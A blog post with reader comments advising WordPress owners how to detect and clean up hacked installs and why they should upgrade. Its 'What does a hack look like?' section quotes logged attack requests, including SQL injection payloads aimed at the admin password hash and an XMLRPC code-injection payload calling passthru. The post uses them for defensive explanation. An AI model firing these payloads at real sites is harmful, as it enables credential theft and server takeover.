Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define(‘SECRET_KEY’, ‘1234567890’ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:

    < ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version=”1.0″?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Comments

comments

387 Replies to “Did your WordPress site get hacked?”

  1. please add that the theme files could be chaged that was so in my case so i did disinstalled the theme reinstalled it agasin and that worked fiine for me

  2. I have noticed in the past that that base64 code shows up in freeware WP templates. So, beware what templates you pick, the “backdoor” hacker code may already be in an otherwise innocent template and will leave the back gate open to your blog once you install it.

  3. Hello from Germany! May i quote a post a translated part of your blog with a link to you? I’ve tried to contact you for the topic Did your WordPress site get hacked?, but i got no answer, please reply when you have a moment, thanks, Gedicht

  4. My website has wordpress on it, and it got hacked, and everything was stolen, and destroyed! i looked at a page, and code was everywhere!!!

    My SQL dbs all have been screwed up! so now i am sad

  5. Regarding Exploit Scanner .95:

    This thing was nothing but a headache for me. I had to change the files from 50 to 40 to avoid memory problems. After spending several hours scanning 18,000 files, there was silence. Nothing say good or bad.

    On top of that, it increased my database options table from 1 mb to 800 mb. Yes you read that right. 1 mb to 800 mb by adding records that don’t get deleted even when the plugin is deativated. I only noticed it when I tried to backup my database for upgrade to WP3.0. I had to use phpMyadmin to search for all the records and delete them and then repair the database to regain the empty space. It’s not something for the faint of heart.

    If you’re going to try this, backup your database first and check the size afterward.

  6. I countered a problem, in which if i search my blog via google or any search engines, if i click the link ill be redirected to another site.

    Thanks to this article, i kinda got by eval(), which has been stated and also i hvent seen that part in my wp config when i installed my wordpress blog.

    So i deleted it and its working fine now. Thank you so much.

    God speed..:)

  7. Donncha,
    A blog site of mine of got nailed around 4 weeks ago.
    Completely pissed me off. the DB was deleted and my wordpress theme screwed up by some fecker.

    I actually think that the scumbag got in via a issue with filezilla FTP (I have my password booked marked with this program).

    Anyway, lots of tear drops.
    Thanks for sharing your article.

  8. Hi

    I have study you list carefully because someone has attach my website. I can find any malware. My database looks find and I can not find the hidden code you are writing about.

    I is strange they can change my title line in search engine but not in my code.

  9. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    And if they put a backdoor file in cache/ and modify the .htaccess to being able to access it later ? Untraceable.

    1. Yup, then you’re screwed. I disabled AIDE a long time ago. The daily emails were too full of things I didn’t care about to look at them every day.

  10. We suspect that a friend of mine’s WordPress site got hacked. Every time you type in his domain name without the www. in front, it redirects to default.com. Any ideas why this is?

  11. I have a static site and do not blog so all i have to do even if the backups are messed up is to make the page/child structure, add the childs CSS, add the HTML from saved notepad files and images and i am off.

    I feel sorry for people that have to trawl through 3000 pages of crap to filter stuff out. I only download from the official repository and nowhere else. I keep WP up to date even if it breaks my site and then fix the pages. I use most of teh security related plugs as wel even though they scare me just as much

  12. I got this page as first result from searching on xmlrpc.php
    Because some kid was trying to hack my site …
    I notice his weird query for xmlrpc.php file in WassUp visitor history
    First i Block him From .htaccess File
    any way he failed in hes hack attempt ..
    I use WP 3.0.1

  13. Hello,

    PLEASE HELP ME! I have a site running in WP. Recently when I visit it, I get a ‘Malware found’ page. Also when I access the Dashboard, I get some ‘Http:… blah blah’ message at the top, outside the theme. I can’t even download the XML export so that I can update to 3.0.5 as my site runs on 3.0.1. The plugins I had installed were Wassup stats, Akismet, W3 total cache, Fancy pull quotes, News and events, Notices plugin. I’m using Atahualpa theme 4.9.
    Please help me get the malware out!

  14. Thank you very much for these tips on securing your WP site, I’ll definitely use tripwire and a couple other tools to try to secure the site. Again thank you very much for your time writing this blog.

    Pete

  15. I donncha,

    Do you have any idea why some of my plugins are not showing on my admin dashboard although they are installed on my plugins folder? Two of these plugins are (wp super cache and wordpress security scan).. Also, I can no longer install plugin through the wordpress admin.. Any help would be appreciated..

    thanks,
    joliber

  16. – Installed the latest WP-Version 3.2.1 with the theme 2011.
    – Went to
    http://sitecheck.sucuri.net/scanner/
    and made the security scan:

    – Result was, that they showed the internal path
    Wordpress internal path: /internal_path/wordpress/wp-content/themes/twentyeleven/index.php
    – That means that all the people can see my database username.

    How do I avoid that?

  17. I’ve been hacked five times this year and after finally transferring to a new host, I’ve been uploading my old files and databases. Now I’m seriously reconsidering starting from scratch. That seems so much safer since scripts could be left in some of my files right? Sigh

Leave a Reply